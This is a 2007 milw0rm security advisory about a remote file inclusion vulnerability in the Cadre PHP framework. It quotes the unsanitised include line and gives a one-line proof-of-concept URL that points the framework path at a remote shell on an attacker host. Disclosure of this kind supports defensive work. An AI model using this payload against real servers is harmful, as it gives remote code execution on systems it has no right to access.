Cadre PHP Framework Remote File Include Vulnerability :

Date : 2007-01-31 Author : y3dips
____________________   ___ ___ ________
\_   _____/\_   ___  /   |   \_____  
 |    __)_ /      //    ~    /   |   
 |        \     \___    Y    /    |    
/_______  / \______  /\___|_  /\_______  /
        /         /       /         /                              .OR.ID
ECHO_ADV_63$2007

------------------------------------------------------------------------------------
[ECHO_ADV_63$2007] Cadre remote file inclusion
------------------------------------------------------------------------------------

Author		: Ahmad Muammar W.K (a.k.a) y3dips
Date Found	: January, 31st 2007
Location	: Indonesia, Jakarta
web		: http://echo.or.id/adv/adv63-y3dips-2007.txt
Critical Lvl	: Critical
------------------------------------------------------------------------------------


Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~

Application   : Cadre
URL           : http://www.cronosys.com | http://savannah.gnu.org/projects/cadre/
Download-path : http://ftp.azc.uam.mx/mirrors/gnu/savannah/files/cadre/cadre-20020724.tar.gz

Description   : Cadre is a PHP framework for developing large business applications. 
		It currently supports PostgreSQL as the database back end (although 
		this is extensible). We (Cronosys, LLC) have invested two and a half 
		years in this framework and applications based on this framework.

---------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~

	---------------class.Quick_Config_Browser.php --------------------
	...
	include_once($GLOBALS[config][framework_path] . "class.Browser.php");
	...
	------------------------------------------------------------------


	An attacker can exploit this vulnerability with a simple php injection script.

Poc/Exploit:
~~~~~~~~

http://target/cadre/fw/class.Quick_Config_Browser.php?GLOBALS[config][framework_path]=http://attacker/shell.php?

---------------------------------------------------------------------------
Shoutz:
~~~
~ my lovely ana
~ k-159 (my greatest brotha), the_day (young evil thinker), and all echo staff
~ str0ke, waraxe, negative
~ [email protected]
~ #e-c-h-o @irc.dal.net

---------------------------------------------------------------------------
Contact:
~~~~

     y3dips|| echo|staff || y3dips[at]gmail[dot]com
     Homepage: http://y3dips.echo.or.id/

# milw0rm.com [2007-01-31]

C1

 

C2

 

C3